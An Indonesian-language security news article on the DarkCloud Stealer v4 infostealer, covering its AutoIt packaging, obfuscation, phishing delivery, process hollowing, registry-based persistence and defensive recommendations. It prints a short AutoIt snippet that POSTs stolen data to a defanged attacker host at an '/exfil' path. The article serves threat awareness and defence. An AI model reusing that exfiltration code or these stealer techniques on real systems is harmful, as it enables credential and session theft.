Versi Baru DarkCloud Gunakan AutoIt, Targetkan Data Login

Dunia siber kembali diguncang dengan kemunculan varian baru dari malware pencuri informasi yang dikenal dengan nama DarkCloud Stealer. Versi keempat dari malware ini, yang disebut DarkCloud Stealer v4, terdeteksi sejak Maret 2025 dan langsung menarik perhatian komunitas keamanan siber global karena kemampuannya menyusup secara diam-diam dan mencuri data-data sensitif dari berbagai sektor penting di Asia dan Eropa.

Dengan mengandalkan bahasa pemrograman AutoIt, malware ini mampu menyelinap melalui celah pertahanan tradisional sistem keamanan dan menargetkan informasi penting seperti kata sandi, cookie browser, hingga token autentikasi dua langkah (2FA). Penggunaan teknik klasik namun masih efektif, seperti process hollowing dan obfuscation, menjadikan DarkCloud v4 salah satu ancaman paling serius di paruh pertama tahun ini.

Menghidupkan Kembali Teknik Lama: AutoIt dan Obfuscation

Para peneliti dari Unit 42 Palo Alto Networks, yang menjadi salah satu tim pertama yang mengungkap malware ini, mengungkapkan bahwa DarkCloud v4 menggunakan AutoIt, sebuah bahasa skrip yang biasa digunakan untuk mengotomatisasi tugas-tugas di sistem operasi Windows.

Biasanya, AutoIt digunakan untuk membuat script otomatisasi seperti klik tombol, buka aplikasi, atau mengetik teks. Namun, di tangan pelaku kejahatan siber, bahasa ini berubah menjadi alat penyusup yang ampuh.

Skrip AutoIt kemudian dikompilasi menjadi file executable (exe) yang tampak seperti program biasa. File ini memiliki tampilan yang sah sehingga dapat menipu sistem keamanan dan menyelinap melalui pemindaian otomatis maupun analisis di lingkungan isolasi seperti sandbox.

Selain itu, DarkCloud v4 juga menerapkan teknik obfuscation yaitu teknik pengacakan dan penyamaran kode program agar sulit dianalisis. Penggunaan enkripsi seperti Base64 dan XOR, serta penambahan kode sampah, membuat alat analisis statis kesulitan membaca tujuan asli dari script yang dijalankan.

Modus Serangan DarkCloud v4

Malware ini disebarkan melalui berbagai jalur yang memanfaatkan rekayasa sosial (social engineering), termasuk:

• Email phishing yang menyamar sebagai tagihan atau invoice palsu.
• Iklan palsu yang diarahkan ke situs web berbahaya.
• Pembaruan software palsu yang meniru aplikasi populer seperti Slack dan Zoom.

Setelah dijalankan di perangkat korban, malware akan segera mencuri berbagai jenis data seperti:

• Cookies browser, yang menyimpan informasi sesi dan login pengguna.
• Data autofill, termasuk nama pengguna dan kata sandi yang tersimpan.
• Token 2FA, yang memungkinkan pelaku untuk melewati sistem keamanan tambahan.

Semua data tersebut dikirim ke server milik peretas melalui koneksi HTTPS terenkripsi, sehingga sangat sulit dideteksi oleh firewall atau alat monitoring jaringan standar.

Dampak Serius dan Perdagangan Data di Darknet

Unit 42 mengungkapkan bahwa dalam waktu singkat sejak kemunculannya, DarkCloud v4 telah menyebabkan kebocoran lebih dari 120.000 akun milik individu maupun perusahaan. Data login yang dicuri dijual di pasar gelap atau darknet, dan digunakan kembali oleh pelaku lain untuk kejahatan siber lanjutan seperti pencurian identitas, pembobolan akun finansial, atau akses tidak sah ke sistem internal perusahaan.

Yang membuat malware ini semakin berbahaya adalah desainnya yang modular. Artinya, pelaku dapat memperbarui dan mengganti muatan jahat kapan pun mereka inginkan, sehingga malware tetap efektif meskipun sistem keamanan diperbarui.

Teknik Process Hollowing: Diam-diam Mengendalikan Sistem

Salah satu teknik paling canggih yang digunakan oleh DarkCloud v4 adalah process hollowing. Ini adalah metode di mana malware menyuntikkan dirinya ke dalam proses sah seperti explorer.exe atau svchost.exe.

Proses ini dilakukan dengan cara:

• Menghentikan proses target.
• Mengganti memori proses dengan kode jahat.
• Menjalankan kembali proses tersebut seolah-olah tidak terjadi apa-apa.

Akibatnya, pengguna maupun sistem keamanan tidak menyadari bahwa proses yang sedang berjalan sebenarnya telah dibajak oleh malware.

Selain itu, untuk mempertahankan eksistensinya setelah komputer di-restart, DarkCloud v4 membuat jadwal tugas otomatis (scheduled tasks) dan menambahkan entri pada Registry Windows, tepatnya di:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Dengan langkah ini, malware akan kembali aktif setiap kali sistem menyala.

Contoh Kode AutoIt yang Digunakan oleh Malware

Peneliti menemukan bahwa DarkCloud menggunakan perintah-perintah AutoIt yang telah dikompilasi untuk menyampaikan data curian ke server jahat. Berikut adalah contoh potongan kodenya:

#include    
$hSession = _WinHttpOpen()   
$hConnect = _WinHttpConnect($hSession, "malware[.]cc")   
$hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil",..., $sData)

Kode ini menunjukkan bagaimana malware membuat sesi HTTP dan mengirimkan data hasil curian melalui metode POST ke server milik pelaku kejahatan.

Menghindari Deteksi: Ancaman Bagi Sistem Keamanan Tradisional

Penggunaan AutoIt, yang tidak umum digunakan dalam malware pada umumnya, membuat DarkCloud v4 sulit dideteksi oleh sistem signature-based detection, yaitu sistem yang mengenali malware berdasarkan tanda tangan atau pola yang telah diketahui.

Ditambah lagi, kombinasi antara enkripsi, penyamaran, dan injeksi ke dalam proses sah menjadikan malware ini nyaris tak terlihat oleh sistem keamanan standar. Bahkan banyak alat antivirus yang tidak menganggap file AutoIt sebagai ancaman.

Langkah Pencegahan: Apa yang Bisa Dilakukan Organisasi?
Dengan ancaman baru ini, para ahli keamanan siber menyarankan beberapa tindakan pencegahan penting:

1. Pantau Proses Mencurigakan
   Organisasi harus memantau aktivitas proses yang menggunakan AutoIt, terutama yang mencoba terhubung ke domain tidak dikenal. Proses seperti ini bisa menjadi indikator awal adanya infeksi.
2. Gunakan Deteksi Berbasis Perilaku
   Sistem keamanan berbasis behavioral detection atau deteksi perilaku jauh lebih efektif untuk kasus ini. Sistem ini akan memperhatikan aktivitas yang tidak biasa seperti:
   • Akses cepat terhadap banyak data login.
   • Aktivitas memori yang mencurigakan.
   • Injeksi ke proses sistem.
3. Implementasi Application Allowlisting
   Dengan menerapkan kebijakan application allowlisting, hanya aplikasi yang disetujui dan terverifikasi yang boleh dijalankan di sistem organisasi. Ini sangat membantu mencegah eksekusi file berbahaya seperti executable hasil kompilasi AutoIt.
4. Segmentasi Jaringan
   Network segmentation penting untuk membatasi pergerakan malware jika berhasil masuk ke dalam jaringan. Dengan membagi jaringan menjadi beberapa segmen, kerusakan bisa diminimalisir dan lebih mudah dikendalikan.
5. Deteksi File AutoIt
   Organisasi juga disarankan untuk mengidentifikasi file AutoIt yang telah dikompilasi (.a3x) atau skrip mencurigakan yang berasal dari aplikasi-aplikasi yang seharusnya tidak memiliki fitur scripting.

DarkCloud Stealer v4 merupakan pengingat keras bahwa pelaku kejahatan siber terus mengembangkan cara-cara baru, bahkan dengan menggunakan alat lama seperti AutoIt, untuk melancarkan aksinya. Kombinasi teknik penyamaran, penyusupan ke proses sah, dan pencurian data yang canggih membuat malware ini sangat berbahaya.

Organisasi dan pengguna individu harus lebih waspada terhadap teknik rekayasa sosial, tidak sembarang mengklik tautan atau mengunduh file dari sumber tidak terpercaya. Di saat yang sama, pendekatan keamanan siber harus berkembang dari sekadar deteksi berbasis tanda tangan menjadi deteksi berbasis perilaku dan analisis memori yang lebih dalam.

Perlindungan terhadap data sensitif seperti login akun, informasi pelanggan, dan akses internal organisasi kini semakin krusial. Kecanggihan DarkCloud v4 menandai bahwa perang di dunia maya masih jauh dari selesai dan hanya dengan kesadaran, teknologi yang adaptif, serta kebijakan keamanan yang ketat, kita bisa bertahan dari ancaman ini.